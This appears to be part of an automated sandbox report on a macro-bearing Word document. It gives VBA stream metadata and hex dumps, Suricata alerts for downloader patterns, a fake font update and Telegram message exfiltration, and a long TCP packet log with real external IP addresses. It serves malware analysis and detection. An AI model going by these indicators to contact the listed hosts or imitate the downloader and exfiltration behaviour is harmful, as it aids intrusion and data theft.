Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
Data Raw:	cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522

General
Stream Path:	Macros/VBA/dir
CLSID:
File Type:	VAX-order 68k Blit mpx/mux executable
Stream Size:	522
Entropy:	6.270753028557882
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . m . . A ! O f f i c g O D . f . i . c g . .
Data Raw:	01 06 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 9b 2e 9b 69 0f 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	1.0821612686374833
Base64 Encoded:	False
Data ASCII:	. Y . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j [ [ . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . \\ 9 . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ; . . . 0 . . . . . . . . .
Data Raw:	ec a5 c1 00 59 e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 5b c9 5b c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 39 a3 0a 5c 39 a3 0a 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-16T08:25:25.488734+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49715	166.62.27.188	443	TCP
2025-01-16T08:25:34.041600+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49758	132.226.247.73	80	TCP
2025-01-16T08:25:35.338509+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49758	132.226.247.73	80	TCP
2025-01-16T08:25:35.893583+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49779	104.21.80.1	443	TCP
2025-01-16T08:25:37.619409+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49785	132.226.247.73	80	TCP
2025-01-16T08:25:38.916288+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49796	132.226.247.73	80	TCP
2025-01-16T08:25:40.797543+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49814	104.21.80.1	443	TCP
2025-01-16T08:25:42.151370+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49827	104.21.80.1	443	TCP
2025-01-16T08:25:44.858840+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49842	104.21.80.1	443	TCP
2025-01-16T08:25:47.236592+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49858	104.21.80.1	443	TCP
2025-01-16T08:25:48.129975+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49863	132.226.247.73	80	TCP
2025-01-16T08:25:48.166873+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49865	149.154.167.220	443	TCP
2025-01-16T08:25:49.286280+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49863	132.226.247.73	80	TCP
2025-01-16T08:25:49.858794+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49878	104.21.80.1	443	TCP
2025-01-16T08:25:50.587795+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49883	132.226.247.73	80	TCP
2025-01-16T08:25:51.293173+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49889	104.21.80.1	443	TCP
2025-01-16T08:25:52.927070+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49901	104.21.80.1	443	TCP
2025-01-16T08:25:54.227929+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49908	104.21.80.1	443	TCP
2025-01-16T08:25:55.567405+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49921	104.21.80.1	443	TCP
2025-01-16T08:25:55.831084+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49915	132.226.247.73	80	TCP
2025-01-16T08:25:56.971678+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49915	132.226.247.73	80	TCP
2025-01-16T08:25:57.527764+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49935	104.21.80.1	443	TCP
2025-01-16T08:25:58.252943+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.5	49941	132.226.247.73	80	TCP
2025-01-16T08:26:02.407941+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	49976	149.154.167.220	443	TCP
2025-01-16T08:26:09.511604+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.5	50038	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 08:25:21.949862003 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:21.954670906 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:21.954756975 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:21.954865932 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:21.959669113 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.478033066 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.478096962 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.478143930 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.478199959 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.478204966 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.478235960 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.478246927 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.478272915 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.478391886 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.517112970 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.517184973 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.517221928 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.517250061 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.517271042 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.517306089 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.517334938 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.517565966 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.517601013 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.517657042 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.565638065 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.565674067 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.565696001 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.565710068 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.565762997 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.565779924 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.565834999 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.565886021 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.565898895 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.565922022 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.565958977 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.565988064 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.566572905 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.566627979 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.566631079 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.566663027 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.566749096 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.604722023 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.604775906 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.604811907 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.604846001 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.604867935 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.604882002 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.604911089 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.605037928 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.605084896 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.605092049 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.605127096 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.605192900 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.605204105 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.605608940 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.605663061 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.605690956 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.605696917 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.605732918 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.605742931 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.605768919 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.605813980 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.653126955 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653162003 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653198957 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653212070 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.653255939 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653291941 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653306007 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.653326988 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653387070 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.653585911 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653620958 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653656006 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653669119 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.653740883 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653775930 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653789043 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.653810978 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.653860092 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.654583931 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.654619932 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.654655933 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.654670954 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.654690027 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.654725075 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.654735088 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.654758930 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.654813051 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.655349970 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692146063 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692181110 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692215919 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692234039 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.692262888 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.692281961 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692317009 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692354918 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692377090 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.692574024 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692608118 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692632914 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.692660093 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692693949 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692712069 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.692728996 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692760944 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692778111 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.692795992 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.692850113 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.693450928 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.693485022 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.693532944 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.693537951 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.693582058 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.693617105 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.693646908 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.693650961 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.693686008 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.693713903 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.694322109 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.694375038 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.694379091 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.694410086 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.694458008 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.694478989 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.694513083 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.694547892 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.694576025 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.694577932 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.694729090 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.740493059 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.740528107 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.740587950 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.740593910 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.740650892 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.740693092 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.740721941 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.740746975 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.740782022 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.740814924 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.740840912 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.740849972 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.740875006 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.741599083 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.741636038 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.741666079 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.741669893 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.741705894 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.741718054 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.742016077 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.742069006 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.742072105 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.742103100 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.742136955 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.742168903 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.742172003 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.742204905 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.742224932 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.742240906 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.742294073 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.742835999 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.742887974 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.742938042 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.742938995 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.742974043 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.743025064 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.743026972 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.743058920 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.743096113 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.743113995 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.743716955 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.743771076 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.779659033 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.779700994 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.779752016 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.779757977 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.779787064 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.779824972 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.779836893 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.779942036 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.779994965 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780030012 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780046940 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.780083895 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780085087 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.780155897 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780206919 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.780211926 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780246019 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780281067 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780314922 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780337095 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.780364037 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.780783892 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780836105 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780869961 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780900002 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.780905962 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780940056 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.780961037 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.781021118 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.781068087 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.781299114 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.781352997 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.781399965 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.781405926 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.781441927 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.781476974 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.781488895 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.781513929 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.781549931 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.781584024 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.781605959 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.781619072 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.781631947 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.782304049 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.782356977 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.782358885 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.782391071 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.782424927 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.782440901 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.782475948 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.782510996 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.782546043 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.782573938 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.782579899 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.782603979 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.782614946 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.782655001 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.783118010 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.783204079 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.783248901 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.783257008 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.783308029 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.783355951 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.783396959 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.783421993 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.783432007 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.783441067 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.783468008 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.783548117 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.820846081 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.820880890 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.820914984 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.820946932 CET	49711	80	192.168.2.5	147.124.216.113
Jan 16, 2025 08:25:22.827970982 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828028917 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828063011 CET	80	49711	147.124.216.113	192.168.2.5
Jan 16, 2025 08:25:22.828085899 CET	49711	80	192.168.2.5	147.124.216.113
